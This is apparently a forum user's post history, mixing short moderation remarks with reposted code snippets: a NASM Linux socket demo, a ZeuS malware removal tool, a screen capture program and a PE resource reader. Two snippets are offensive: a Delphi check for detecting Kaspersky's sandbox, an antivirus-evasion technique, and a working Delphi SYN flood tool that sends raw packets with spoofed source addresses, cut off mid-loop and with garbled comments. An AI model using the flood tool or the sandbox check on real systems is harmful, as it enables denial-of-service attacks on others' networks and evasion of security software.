Everything posted by Nytro

  1. Nytro

    begood

    There are more important things in the world than sitting around reading stupid posts and handing out bans or warnings.
  2. Yes, it's well thought out.
  3. I like how it looks. Yes, useful.
  4. I didn't ban him for that; I banned him for the post about Madalina Manole and another 3-4 stupid posts. Look at all his posts.
  5. No, little by little we're getting rid of the rejects.
  6. Pff, what tutorials...
  7. So much intelligence in the opposing camps. What made you make that exclamation? I'm a Dinamo fan; should I feel insulted by the abuse from what is probably a Steaua-supporting kid who doesn't even go to the matches of the team he claims to support? Speaking of which, who's coming to the match against Poli in the stands, at PCH?
  8. I'm a fat guy, covered in pimples, and I wear glasses. You've offended me. Ban? You didn't get off on the right foot; a good step would be to apologize for the insults and write a short self-description to replace the one we've already formed of you.
  9. [NASM] Linux Sockets

      Author: DemonEmporer:

      Right so, It's been a while since I actually contributed anything. Declans Wind0ze hatin'(j/k j/k lol) got me thinkin' about somethin' I could do in linux. And reading through a few pages I noticed a lack of linux based ASM or NASM for that matter. You may find this educational, silly or totally random or all 3. Either way. So I thought in my spare time, I'd start doing some NASM linux examples(They are linux specific, not *nix. BSD has a different interpret style). Hello worlds aside I thought I'd do something slightly more interesting and throw in a socket connection.

          %assign SOCK_STREAM 1
          %assign AF_INET 2
          %assign SYS_socketcall 102
          %assign SYS_SOCKET 1
          %assign SYS_CONNECT 3
          %assign SYS_SEND 9
          %assign SYS_RECV 10

          section .text
          global _start

          ;--------------------------------------------------
          ;Functions to make things easier. :]
          ;--------------------------------------------------
          _socket:
              mov [cArray+0], dword AF_INET
              mov [cArray+4], dword SOCK_STREAM
              mov [cArray+8], dword 0
              mov eax, SYS_socketcall
              mov ebx, SYS_SOCKET
              mov ecx, cArray
              int 0x80
              ret

          _connect:
              call _socket
              mov dword [sock], eax
              mov dx, si
              mov byte [edi+3], dl
              mov byte [edi+2], dh
              mov [cArray+0], eax ;sock;
              mov [cArray+4], edi ;&sockaddr_in;
              mov edx, 16
              mov [cArray+8], edx ;sizeof(sockaddr_in);
              mov eax, SYS_socketcall
              mov ebx, SYS_CONNECT
              mov ecx, cArray
              int 0x80
              ret

          _send:
              mov edx, [sock]
              mov [sArray+0],edx
              mov [sArray+4],eax
              mov [sArray+8],ecx
              mov [sArray+12], dword 0
              mov eax, SYS_socketcall
              mov ebx, SYS_SEND
              mov ecx, sArray
              int 0x80
              ret

          _exit:
              mov eax, 1
              int 0x80

          _print:
              mov ebx, 1
              mov eax, 4
              int 0x80
              ret

          ;--------------------------------------------------
          ;Main code body
          ;--------------------------------------------------
          _start:
              mov esi, szIp
              mov edi, sockaddr_in
              xor eax,eax
              xor ecx,ecx
              xor edx,edx
          .cc:
              xor ebx,ebx
          .c:
              lodsb
              inc edx
              sub al,'0'
              jb .next
              imul ebx,byte 10
              add ebx,eax
              jmp short .c
          .next:
              mov [edi+ecx+4],bl
              inc ecx
              cmp ecx,byte 4
              jne .cc

              mov word [edi], AF_INET
              mov esi, szPort
              xor eax,eax
              xor ebx,ebx
          .nextstr1:
              lodsb
              test al,al
              jz .ret1
              sub al,'0'
              imul ebx,10
              add ebx,eax
              jmp .nextstr1
          .ret1:
              xchg ebx,eax
              mov [sport], eax
              mov si, [sport]
              call _connect
              cmp eax, 0
              jnz short _fail
              mov eax, msg
              mov ecx, msglen
              call _send
              call _exit

          _fail:
              mov edx, cerrlen
              mov ecx, cerrmsg
              call _print
              call _exit

          _recverr:
              call _exit

          _dced:
              call _exit

          section .data
          cerrmsg db 'failed to connect ',0xa
          cerrlen equ $-cerrmsg
          msg db 'DIE DIE DIE!',0xa
          msglen equ $-msg
          szIp db '127.0.0.1',0
          szPort db '256',0

          section .bss
          sock resd 1
          ;general 'array' for syscall_socketcall argument arg.
          cArray resd 1
                 resd 1
                 resd 1
                 resd 1
          ;send 'array'.
          sArray resd 1
                 resd 1
                 resd 1
                 resd 1
          ;duh?
          sockaddr_in resb 16
          ;..
          sport resb 2
          buff resb 1024

      Assemble:

          nasm -o socket.o -f elf32 -g socket.asm

      Link:

          ld -o socket socket.o

      It uses 0 external libraries, hence the ld link line. Next time, we might do something with GTK(QT has a CPP interface and is more annoying to call from ASM XD). If you have any questions, feel free to ask and I'll answer as best I can.
  10. [C] ZeuS Killer

      Author: I don't know...

          #include <windows.h>
          #pragma warning(disable : 4005) // macro redefinition
          #include <ntdll.h>
          #pragma warning(default : 4005)
          #include <shlwapi.h>
          #include <shlobj.h>

          void GetZeusInfo(ULONG dwArg, PCHAR lpOut, DWORD dwOutLn, PCHAR lpMutex, DWORD dwMutexLn)
          {
              PSYSTEM_HANDLE_INFORMATION shi = 0;
              NTSTATUS Status = 0;
              ULONG len = 0x2000;
              POBJECT_NAME_INFORMATION obn = 0;
              HANDLE proc = 0, thandle = 0, hFile = 0;
              BOOLEAN enable = FALSE;
              UCHAR name[300] = {0};
              ULONG temp = 0, rw = 0;

              do {
                  shi = (PSYSTEM_HANDLE_INFORMATION)malloc(len);
                  if (shi == 0) {
                      return;
                  }
                  Status = NtQuerySystemInformation(SystemHandleInformation, shi, len, NULL);
                  if (Status == STATUS_INFO_LENGTH_MISMATCH) {
                      free(shi);
                      len *= 2;
                  } else if (NT_ERROR(Status)) {
                      free(shi);
                      return;
                  }
              } while (Status == STATUS_INFO_LENGTH_MISMATCH);

              RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, 1, 0, &enable);

              for (int i=0; i<(int)shi->uCount; i++) {
                  proc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, shi->aSH[i].uIdProcess);
                  if (proc == 0) {
                      continue;
                  }
                  Status = NtDuplicateObject(proc, (HANDLE)shi->aSH[i].Handle, NtCurrentProcess(), &thandle, 0, 0, DUPLICATE_SAME_ACCESS);
                  if (NT_ERROR(Status)) {
                      NtClose(proc);
                      continue;
                  }
                  Status = NtQueryObject(thandle, ObjectNameInformation, 0, 0, &len);
                  if (Status != STATUS_INFO_LENGTH_MISMATCH || len == 0) {
                      NtClose(thandle);
                      NtClose(proc);
                      continue;
                  }
                  obn = (POBJECT_NAME_INFORMATION)malloc(len);
                  if (obn == 0) {
                      NtClose(thandle);
                      NtClose(proc);
                      continue;
                  }
                  Status = NtQueryObject(thandle, ObjectNameInformation, obn, len, &len);
                  if (NT_ERROR(Status) || obn->Name.Buffer == 0) {
                      free(obn);
                      NtClose(thandle);
                      NtClose(proc);
                      continue;
                  }
                  RtlZeroMemory(name, sizeof(name));
                  WideCharToMultiByte(CP_ACP, 0, obn->Name.Buffer, obn->Name.Length >> 1, (LPSTR)name, 300, NULL, NULL);
                  if (strstr((LPSTR)name, "__SYSTEM__") || strstr((LPSTR)name, "_AVIRA_")) {
                      lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\");
                      lstrcatW((LPWSTR)name, obn->Name.Buffer);
          __retry:
                      hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
                      if (hFile == INVALID_HANDLE_VALUE) {
                          WaitNamedPipeW((LPWSTR)name, INFINITE);
                          hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
                          if (hFile == INVALID_HANDLE_VALUE) {
                              WCHAR wszBNO[] = { L"\\BaseNamedObjects\\" };
                              if (LPWSTR wszBNOPos = StrStrW((LPWSTR)name, wszBNO)) {
                                  lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\");
                                  lstrcatW((LPWSTR)name, (LPWSTR)((PBYTE)wszBNOPos + (sizeof(wszBNO) - 1 * sizeof(WCHAR))));
                                  goto __retry;
                              }
                              free(obn);
                              NtClose(thandle);
                              NtClose(proc);
                              continue;
                          }
                      }
                      temp = PIPE_READMODE_MESSAGE;
                      if (!SetNamedPipeHandleState(hFile, &temp, 0, 0)) {
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      temp = dwArg;
                      if (!WriteFile(hFile, &temp, 4, &rw, 0)) {
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      temp = 0;
                      if (!WriteFile(hFile, &temp, 4, &rw, 0)) {
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      temp = 0;
                      if (!WriteFile(hFile, &temp, 0, &rw, 0)) {
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      temp = 0;
                      if (!ReadFile(hFile, &temp, 4, &rw, 0)) {
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      temp = 0;
                      if (!ReadFile(hFile, &temp, 4, &rw, 0)) {
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      if (temp > MAX_PATH) {
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      rw = temp;
                      temp = (ULONG)malloc(temp);
                      if (!temp) {
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      if (!ReadFile(hFile, (PVOID)temp, rw, &rw, 0)) {
                          free((PVOID)temp);
                          CloseHandle(hFile);
                          free(obn);
                          NtClose(thandle);
                          NtClose(proc);
                          continue;
                      }
                      if ( (temp) && lstrlenW((LPCWSTR)temp) < (int)dwOutLn) {
                          RtlZeroMemory(lpOut, dwOutLn);
                          WideCharToMultiByte(CP_ACP, 0, (PWCHAR)temp, lstrlenW((LPCWSTR)temp), (LPSTR)lpOut, dwOutLn, NULL, NULL);
                      }
                      if (lpMutex) {
                          LPWSTR lpwMutexName = obn->Name.Buffer;
                          LPWSTR lpwTemp;
                          while (lpwTemp = StrStrW(lpwMutexName, L"\\")) {
                              lpwMutexName = lpwTemp + 1;
                          }
                          RtlZeroMemory(lpMutex, dwMutexLn);
                          WideCharToMultiByte(CP_ACP, 0, lpwMutexName, lstrlenW(lpwMutexName), (LPSTR)lpMutex, dwMutexLn, NULL, NULL);
                      }
                      free((PVOID)temp);
                      CloseHandle(hFile);
                  }
                  free(obn);
                  NtClose(thandle);
                  NtClose(proc);
              }
          }

          BOOL DeleteHiddenFile(PCHAR szPath)
          {
              SetFileAttributes(szPath, FILE_ATTRIBUTE_ARCHIVE);
              return DeleteFile(szPath);
          }

          #define ZEUS_FASTCLEAN

          BOOL KillZeus()
          {
              // Getting info
              CHAR szMutexName[MAX_PATH] = {0};
              CHAR szZeusPath[MAX_PATH];
              GetZeusInfo(11, szZeusPath, sizeof szZeusPath, szMutexName, sizeof szMutexName);
              if (!strlen(szMutexName)) {
          #ifdef _DEBUGLITE
                  OutputDebugStringEx(__FUNCTION__" : ERROR : Cannot get szMutexName");
          #endif
                  return FALSE;
              }
          #ifndef ZEUS_FASTCLEAN
              CHAR szZeusConfig[MAX_PATH];
              GetZeusInfo(12, szZeusConfig, sizeof szZeusConfig, NULL, NULL);
              CHAR szZeusLog[MAX_PATH];
              GetZeusInfo(13, szZeusLog, sizeof szZeusLog, NULL, NULL);
          #endif
          #ifdef _DEBUGLITE
              OutputDebugStringEx(__FUNCTION__" : INFO : 0.) Mutex \"%s\"", szMutexName);
              OutputDebugStringEx(__FUNCTION__" : INFO : 1.) Path \"%s\"", szZeusPath);
          #ifndef ZEUS_FASTCLEAN
              OutputDebugStringEx(__FUNCTION__" : INFO : 2.) Config \"%s\"", szZeusConfig);
              OutputDebugStringEx(__FUNCTION__" : INFO : 3.) Log \"%s\"", szZeusLog);
          #endif
          #endif

              // Killing
              GetZeusInfo(3, NULL, NULL, NULL, NULL);

              // Waiting
              HANDLE hMutex;
              for (INT i = 0; i < 10; i++) {
                  hMutex = OpenMutex(MUTANT_QUERY_STATE|SYNCHRONIZE|STANDARD_RIGHTS_REQUIRED, FALSE, szMutexName);
                  if (!hMutex)
                      break;
                  CloseHandle(hMutex);
                  Sleep(1000);
              }
              if (hMutex) {
          #ifdef _DEBUGLITE
                  OutputDebugStringEx(__FUNCTION__" : ERROR : hMutex is still active");
          #endif
                  return FALSE;
              }

              // Deleting files
              if (!DeleteHiddenFile(szZeusPath)) {
          #ifdef _DEBUGLITE
                  OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusPath);
          #endif
              }
          #ifndef ZEUS_FASTCLEAN
              if (!DeleteHiddenFile(szZeusConfig)) {
          #ifdef _DEBUGLITE
                  OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusConfig);
          #endif
              }
              if (!DeleteHiddenFile(szZeusLog)) {
          #ifdef _DEBUGLITE
                  OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"", szZeusLog);
          #endif
              }
          #endif
          #ifdef _DEBUGLITE
              OutputDebugStringEx(__FUNCTION__" : INFO : EXIT");
          #endif
              return TRUE;
          }
  11. [Delphi] Screen Capture with parameters

      Author: zoom (I think)

          program ScreenShot;

          uses
            Windows, Graphics, Jpeg;

          procedure ScreenToFile(FileName: string; Quality: Word; Percent: Word);
          var
            Bmp: TBitmap;
            Jpg: TJpegImage;
          begin
            Bmp := TBitmap.Create;
            Jpg := TJpegImage.Create;
            try
              Bmp.Width := GetDeviceCaps(GetDc(0), 8) * Percent div 100;
              Bmp.Height := GetDeviceCaps(GetDc(0), 10) * Percent div 100;
              SetStretchBltMode(Bmp.Canvas.Handle, HALFTONE);
              StretchBlt(Bmp.Canvas.Handle, 0, 0, Bmp.Width, Bmp.Height, GetDc(0), 0, 0, GetDeviceCaps(GetDc(0), 8), GetDeviceCaps(GetDc(0), 10), SRCCOPY);
              Jpg.Assign(Bmp);
              Jpg.CompressionQuality := Quality;
              Jpg.SaveToFile(FileName);
            finally
              Jpg.free;
              Bmp.free;
            end;
          end;

          begin
            ScreenToFile('SHOT.JPG', 50, 70);
          end.
  12. [Delphi] Bypass KAV 2010 Sandbox

      Author: chaincoder

          program KAV;

          uses
            WINDOWS,sysutils;

          PROCEDURE SAVE(NEWDROPPATH:STRING);
          var
            F:FILE;
            BUFFERSTRING :STRING;
          BEGIN
            AssignFile(F, NewDropPath);
            Rewrite(F, 1);
            BUFFERSTRING:='555555555555555555555555555';
            If (IOResult = 0) Then
            Begin
              BlockWrite(F, BufferString[1], Length(Bufferstring));
              CloseFile(F);
            End;
          END;

          Function TranslateMacro(Macro: String): String;
          Var
            Size :Cardinal;
            Output :Array[0..MAX_PATH] of Char;
          Begin
            Result := '';
            FillChar(Output, SizeOf(Output), #0);
            Size := SizeOf(Output);
            Size := GetEnvironmentVariable(PChar(Macro), Output, Size);
            If (Size > 0) Then
              Result := Output;
          End;

          VAR
            DAT : STRING;
            KIS : STRING;
            APP : STRING;
            i : INTEGER;
            FOUND : BOOLEAN;
          begin
            DAT:=TranslateMacro('APPDATA');
            DELETE(DAT,1,2);
            FOR I:=0 to 100 do
            begin
              KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT';
              DELETEFILE(kis);
            end;
            FOR I:=0 to 100 do
            begin
              KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Application Data\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT';
              DELETEFILE(kis);
            end;
            app:= TranslateMacro('APPDATA')+'\1.txt';
            save(app);
            FOUND:=false;
            FOR I:=0 to 100 do
            begin
              KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT';
              if fileexists(kis) THEN
              BEGIN
                FOUND:=TRUE;
                BREAK;
              END;
            end;
            FOR I:=0 to 100 do
            begin
              KIS:=TranslateMacro('ALLUSERSPROFILE')+'\Application Data\Kaspersky Lab\Sandbox\KLSB1\Device\HarddiskVolume'+inttostr(i)+DAT+'\1.TXT';
              if fileexists(kis) THEN
              BEGIN
                FOUND:=TRUE;
                BREAK;
              END;
            end;
            // deleteFILE(win);
            if FOUND then
              MESSAGEBOX(0,pchar('RUNNING INSIDE KAV)'),'STATUS',0)
            ELSE
              MESSAGEBOX(0,pchar('NOT RUNNING INSIDE KAV)'),'STATUS',0) ;
          end.
  13. [Delphi] Simple Resource API Replacement

      Author: steve10120@ic0de.org

          // steve10120@ic0de.org
          program Test;

          uses
            Windows, SysUtils;

          {$R resource.Res}
          // resource.rc = EXE FILE "Hello.exe"
          //

          type
            { Resource Dir String }
            PImageResourceDirString = ^TImageResourceDirString;
            TImageResourceDirString = packed record
              Length: Word;
              NameString: array[0..0] of WCHAR;
            end;

            { Data Entry }
            PImageResourceDataEntry = ^TImageResourceDataEntry;
            TImageResourceDataEntry = packed record
              OffsetToData: DWORD;
              Size: DWORD;
              CodePage: DWORD;
              Reserved: DWORD;
            end;

            { Dir Entry }
            PImageResourceDirectoryEntry = ^TImageResourceDirectoryEntry;
            TImageResourceDirectoryEntry = packed record
              Name: DWORD;
              OffsetToData: DWORD;
            end;

            { Directory }
            PImageResourceDirectory = ^TImageResourceDirectory;
            TImageResourceDirectory = packed record
              Characteristics: DWORD;
              TimeDateStamp: DWORD;
              MajorVersion: Word;
              MinorVersion: Word;
              NumberOfNamedEntries: Word;
              NumberOfIdEntries: Word;
            end;

          const
            IMAGE_RESOURCE_DATA_IS_DIRECTORY: DWORD = $80000000;
            IMAGE_STRIP_HIGH_BIT: DWORD = $7FFFFFFF;

          function StripHighBit(dwValue:DWORD):DWORD;
          begin
            Result := dwValue and IMAGE_STRIP_HIGH_BIT;
          end;

          function IsDirectory(dwValue:DWORD):Boolean;
          begin
            Result := FALSE;
            if ((dwValue and IMAGE_RESOURCE_DATA_IS_DIRECTORY) <> 0) then
              Result := TRUE;
          end;

          function WideCharToMultiByteEx(var lp: PWideChar): string;
          // function from ErazerZ's UntPeFile
          var
            len: Word;
          begin
            len := Word(lp^);
            SetLength(Result, len);
            Inc(lp);
            WideCharToMultiByte(CP_ACP, 0, lp, Len, PChar(Result), Len +1, nil, nil);
            Inc(lp, len);
            Result := PChar(Result);
          end;

          function GetResource(szResourceType:string; szResourceName:string; var pResource:Pointer; var dwResourceSize:DWORD):Boolean;
          var
            IDH: PImageDosHeader;
            INH: PImageNtHeaders;
            i: DWORD;
            RootIRD: PImageResourceDirectory;
            SubIRD: PImageResourceDirectory;
            DataIRD: PImageResourceDirectory;
            RootEntry: PImageResourceDirectoryEntry;
            SubEntry: PImageResourceDirectoryEntry;
            DataEntry: PImageResourceDirectoryEntry;
            ResData: PImageResourceDataEntry;
            ResType: PImageResourceDirString;
            ResName: PImageResourceDirString;
            hModule: DWORD;
            szResType: string;
            szResName: string;
          begin
            Result := FALSE;
            hModule := GetModuleHandle(nil);
            if (hModule <> 0) then
            begin
              IDH := Pointer(hModule);
              if (IDH^.e_magic = IMAGE_DOS_SIGNATURE) then
              begin
                INH := Pointer(hModule + IDH^._lfanew);
                if (INH^.Signature = IMAGE_NT_SIGNATURE) then
                begin
                  if (INH^.OptionalHeader.DataDirectory[2].VirtualAddress > 0) then
                  begin
                    RootIRD := Pointer(hModule + INH^.OptionalHeader.DataDirectory[2].VirtualAddress);
                    RootEntry := Pointer(DWORD(RootIRD) + SizeOf(TImageResourceDirectory));
                    for i := 0 to (RootIRD^.NumberOfNamedEntries + RootIRD^.NumberOfIdEntries) - 1 do
                    begin
                      if (IsDirectory(RootEntry^.Name)) then
                      begin
                        ResType := Pointer(hModule + INH^.OptionalHeader.DataDirectory[2].VirtualAddress + StripHighBit(RootEntry^.Name));
                        szResType := WideCharToMultiByteEx(PWideChar(DWORD(ResType)));
                        if (szResType = szResourceType) then
                        begin
                          SubIRD := Pointer(DWORD(RootIRD) + StripHighBit(RootEntry^.OffsetToData));
                          SubEntry := Pointer(DWORD(SubIRD) + SizeOf(TImageResourceDirectory));
                          if (IsDirectory(SubEntry^.Name)) then
                          begin
                            ResName := Pointer(DWORD(RootIRD) + StripHighBit(SubEntry^.Name));
                            szResName := WideCharToMultiByteEx(PWideChar(DWORD(ResName)));
                            if (szResName = szResourceName) then
                            begin
                              Result := TRUE;
                              DataIRD := Pointer(DWORD(RootIRD) + StripHighBit(SubEntry^.OffsetToData));
                              DataEntry := Pointer(DWORD(DataIRD) + SizeOf(TImageResourceDirectory));
                              ResData := Pointer(DWORD(RootIRD) + DataEntry^.OffsetToData);
                              pResource := Pointer(hModule + ResData^.OffsetToData);
                              dwResourceSize := ResData^.Size;
                              Exit;
                            end;
                          end;
                        end;
                      end;
                      Inc(RootEntry);
                    end;
                  end;
                end;
              end;
            end;
          end;

          var
            pRes: Pointer;
            dwSize: DWORD;
            szMsg: string;
          begin
            if (GetResource('FILE', 'EXE', pRes, dwSize)) then
            begin
              szMsg := 'Address: ' + IntToHex(DWORD(pRes), 8) + #13#10 + 'Size: ' + IntToHex(dwSize, 8) + #13#10 + 'First byte: ' + IntToHex(PByte(pRes)^, 0);
              MessageBoxA(0, PChar(szMsg), 'RESOURCES', 0);
            end;
          end.
  14. [Delphi] SYN Flood Author: carbon (cred) program SynFlood; {$APPTYPE CONSOLE} uses Windows, Winsock; //WinSock2; const IP_HDRINCL = 2; // IP Header Include Header_SEQ = $19026695; SEQ = $28376839; SYN_DEST_IP = '172.17.103.127'; //????IP FAKE_IP = '10.168.150.1'; //??IP???????????IP????B??? //TCP? 20? type TCP_HEADER = record th_sport : Word; //16???? th_dport : Word; //16????? th_seq : DWORD; //32???? th_ack : DWORD; //32???? th_lenres : Byte; //4?????+6??????4? th_flag : Byte; //2????+6???? 2?SYN?1?FIN?16?ACK?? th_win : Word; //16????? th_sum : Word; //16???? th_urp : Word; //16???????? end; // IP ? 20? type IP_HEADER = record h_verlen : Byte; //4?????+4?IP??? tos : Byte; //8?????TOS?????????????????????????? total_len : Word; //16???????? IP????????????????20??? ident : Word; //16?IP????????????????????? frag_and_flags : Word; //Fragment Offset 13 IP?????? ttl : Byte; //8?????TTL??????????????? proto : Byte;//8????(TCP, UDP ???) ???ICMP?1?IGMP?2?TCP?6?UDP?17? checksum : Word; //16?IP????? sourceIP : LongWord; //32??IP?? destIP : LongWord; //32???IP?? end; //TCP?? 12? type PSD_HEADER = record saddr : DWORD; //??? daddr : DWORD; //???? mbz : Byte; //?? ptcl : Byte; //???? tcpl : WORD; //TCP?? 
end; type CLIENTPARA = record Port:integer; IP:string; end; var clientpa :^CLIENTPARA; SendSEQ :Integer = 0; TimeOut :Integer =5000; function WSASocketA(af, wType, protocol: integer;lpProtocolInfo: pointer;g, dwFlags: dword): integer;stdcall;external 'ws2_32.dll'; function setsockopt( const s: TSocket; const level, optname: Integer; optval: PChar; const optlen: Integer ): Integer; stdcall;external 'ws2_32.dll'; function IntToStr(I: integer): string; begin Str(I, Result); end; function StrToInt(S: string): integer; begin Val(S, Result, Result); end; function LowerCase(const S: string): string; var Ch: Char; L: Integer; Source, Dest: PChar; begin L := Length(S); SetLength(Result, L); Source := Pointer(S); Dest := Pointer(Result); while L <> 0 do begin Ch := Source^; if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32); Dest^ := Ch; Inc(Source); Inc(Dest); Dec(L); end; end; { CheckSum:????????? IP?????????????IP??????????0?IP_HEADER.checksum=0?, ??????IP???????????????? TCP??????IP???????????????????????????? ??TCP??????????????????????TCP??????? ???TCP??????????????TCP??????? } function checksum(var Buffer; Size: integer): word; type TWordArray = array[0..1] of word; var lSumm: LongWord; iLoop: integer; begin lSumm := 0; iLoop := 0; while Size > 1 do begin lSumm := lSumm + TWordArray(Buffer)[iLoop]; inc(iLoop); Size := Size - SizeOf(word); end; if Size = 1 then lSumm := lSumm + Byte(TWordArray(Buffer)[iLoop]); lSumm := (lSumm shr 16) + (lSumm and $FFFF); lSumm := lSumm + (lSumm shr 16); Result := word(not lSumm); end; //syn???? function SynFloodThreadProc(p:Pointer):LongInt;stdcall; var WSAData :TWSAData; sock :TSocket; Remote :TSockAddr; ipHeader :IP_HEADER; tcpHeader :TCP_HEADER; psdHeader :PSD_HEADER; ErrorCode,bOpt,counter,FakeIpNet,FakeIpHost,datasize :integer; Buf :array [0..127] of char; //FromIP :string; begin Result :=0; //????????? 
if WSAStartup(MAKEWORD(2,2), WSAData)<>0 then exit; sock :=WSASocketA(AF_INET, SOCK_RAW, IPPROTO_RAW, nil, 0, {WSA_FLAG_OVERLAPPED}0); if sock = INVALID_SOCKET then exit; //??ip?? bOpt := 1; //??IP_HDRINCL????????IP?????????? if setsockopt(sock,IPPROTO_IP, IP_HDRINCL,@bOpt, SizeOf(bOpt)) = SOCKET_ERROR then exit; //?????? //ErrorCode :=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,pchar(TimeOut),sizeof(TimeOut)); //if ErrorCode = SOCKET_ERROR then exit; Randomize; FillChar(Remote,sizeof(Remote),#0); Remote.sin_family :=AF_INET; //Remote.sin_addr.s_addr:=inet_addr(SYN_DEST_IP); Remote.sin_addr.S_addr :=inet_addr(pchar(CLIENTPARA(p^).IP)); Remote.sin_port :=htons(CLIENTPARA(p^).Port); FakeIpNet:=inet_addr(FAKE_IP); FakeIpHost:=ntohl(FakeIpNet); //??IP?? ipHeader.h_verlen :=(4 shl 4) or (sizeof(ipHeader) div sizeof(LongWord)); //???IP??????????? ipHeader.total_len :=htons(sizeof(ipHeader)+sizeof(tcpHeader)); //16???????? ipHeader.ident:=1; //16??? ipHeader.tos :=0; //IP???? ipHeader.frag_and_flags:=0; //???? ipHeader.ttl:=128; //8?????TTL ipHeader.proto:=IPPROTO_TCP; //8???(TCP,UDP…) UDP=17 $11 ipHeader.checksum:=0; //16?IP????? ipHeader.sourceIP:=htonl(FakeIpHost+SendSEQ); //32??IP?? //ipHeader.destIP:=inet_addr(pchar(SYN_DEST_IP)); //32???IP?? ipHeader.destIP:=inet_addr(pchar(CLIENTPARA(p^).IP)); //??????? {FromIP:=IntToStr(Random(254)+1)+'.'+ IntToStr(Random(254)+1)+'.'+ IntToStr(Random(254)+1)+'.'+Inttostr(Random(254)+1); ipHeader.sourceIP:=inet_Addr(PChar(FromIP)); //32??IP?? ipHeader.destIP:=Remote.sin_addr.S_addr; //32???IP?? } //??TCP?? tcpHeader.th_sport:=htons(Random(65536)+1); //??????? tcpHeader.th_dport:=Remote.sin_port; //????? //tcpHeader.th_sport:=htons(7000); //???? //tcpHeader.th_dport:=htons(8080); //????? tcpHeader.th_seq:=htonl(SEQ+SendSEQ); //SYN??? tcpHeader.th_ack:=0; //ACK?????0 tcpHeader.th_lenres:=(sizeof(tcpHeader) shr 2 shl 4) or 0; //TCP?????? tcpHeader.th_flag:=2; //???????????2?SYN?1?FIN?16?ACK?? tcpHeader.th_win:=htons(16384); //???? 
tcpHeader.th_urp:=0; //????? tcpHeader.th_sum:=0; //??? //??TCP??????????????????? psdHeader.saddr:=ipHeader.sourceIP; //??? psdHeader.daddr:=ipHeader.destIP; //???? psdHeader.mbz:=0; psdHeader.ptcl:=IPPROTO_TCP; //???? psdHeader.tcpl:=htons(sizeof(tcpHeader)); //TCP???? while true do begin //???10,240?????????? //writeln('.'); for counter:=0 to 10239 do begin inc(SendSEQ); if (SendSEQ=65536) then SendSEQ :=1; //????? //??IP?? ipHeader.checksum :=0; //16?IP????? ipHeader.sourceIP :=htonl(FakeIpHost+SendSEQ); //32??IP?? //??TCP?? tcpHeader.th_seq :=htonl(SEQ+SendSEQ); //SYN??? tcpHeader.th_sum :=0; //??? //??TCP??? psdHeader.saddr :=ipHeader.sourceIP; //??TCP??????????????TCP??? FillChar(Buf,SizeOf(Buf),#0); //??????????????Buf????TCP???? CopyMemory(@Buf[0],@psdHeader,SizeOf(psdHeader)); //12 CopyMemory(@Buf[SizeOf(psdHeader)],@tcpHeader,SizeOf(tcpHeader)); //20 TCPHeader.th_sum:=checksum(Buf,SizeOf(psdHeader)+SizeOf(tcpHeader)); //32 //??IP???? CopyMemory(@Buf[0],@ipHeader,SizeOf(ipHeader)); //20 CopyMemory(@Buf[SizeOf(ipHeader)],@tcpHeader,SizeOf(tcpHeader)); //20 FillChar(Buf[SizeOf(ipHeader)+SizeOf(tcpHeader)],4,#0); datasize :=SizeOf(ipHeader)+SizeOf(tcpHeader); ipHeader.checksum:=checksum(Buf,datasize); //40 //??????? CopyMemory(@Buf[0],@ipHeader,SizeOf(ipHeader)); //20 //??TCP?? 
